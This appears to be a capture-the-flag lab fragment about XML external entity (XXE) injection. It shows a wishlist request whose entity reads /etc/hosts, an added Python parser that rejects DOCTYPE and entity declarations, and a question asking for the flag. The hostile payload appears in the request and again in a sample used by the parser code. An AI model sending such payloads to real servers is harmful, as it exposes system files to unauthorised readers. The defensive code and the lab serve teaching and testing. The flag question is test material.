payload
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>

Update the XML request to include a reference to an external entity.
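The server-side counterpart to the request above, as an added example that is not part of the original page: a wishlist parser that refuses any DOCTYPE or entity declaration before expansion can happen. The names `parse_wishlist`, `ForbiddenXML` and `is_rejected` and both sample requests are constructed for illustration; only the element names come from the payload shown here.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when a request carries a DTD or an entity declaration."""


def parse_wishlist(xml_bytes):
    """Parse a wishlist request; refuse DOCTYPE/ENTITY before any expansion."""
    result = {"user_id": None, "product_ids": []}
    text = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML("DOCTYPE declaration not allowed: %s" % name)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity declaration not allowed: %s" % name)

    def on_start(name, attrs):
        text.clear()  # start collecting character data for this element

    def on_end(name):
        value = "".join(text).strip()
        if name == "user_id":
            result["user_id"] = value
        elif name == "product_id":
            result["product_ids"].append(value)
        text.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype   # fires at "<!DOCTYPE foo ["
    parser.EntityDeclHandler = on_entity_decl     # second line of defence
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return result


# Constructed sample requests; element names follow the payload on this page.
BENIGN = (b'<?xml version="1.0" ?>\n<wishlist><user_id>1</user_id>'
          b'<item><product_id>42</product_id></item></wishlist>')
WITH_DTD = (b'<?xml version="1.0" ?>\n'
            b'<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>\n'
            b'<wishlist><user_id>1</user_id>'
            b'<item><product_id>&payload;</product_id></item></wishlist>')


def is_rejected(xml_bytes):
    """Return True when the parser refuses the request as ForbiddenXML."""
    try:
        parse_wishlist(xml_bytes)
    except ForbiddenXML:
        return True
    return False
```

Because the exception is raised from the DOCTYPE handler, parsing stops before the `&payload;` reference in `product_id` is ever reached.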
1 | What is the flag discovered after navigating through the wishes? |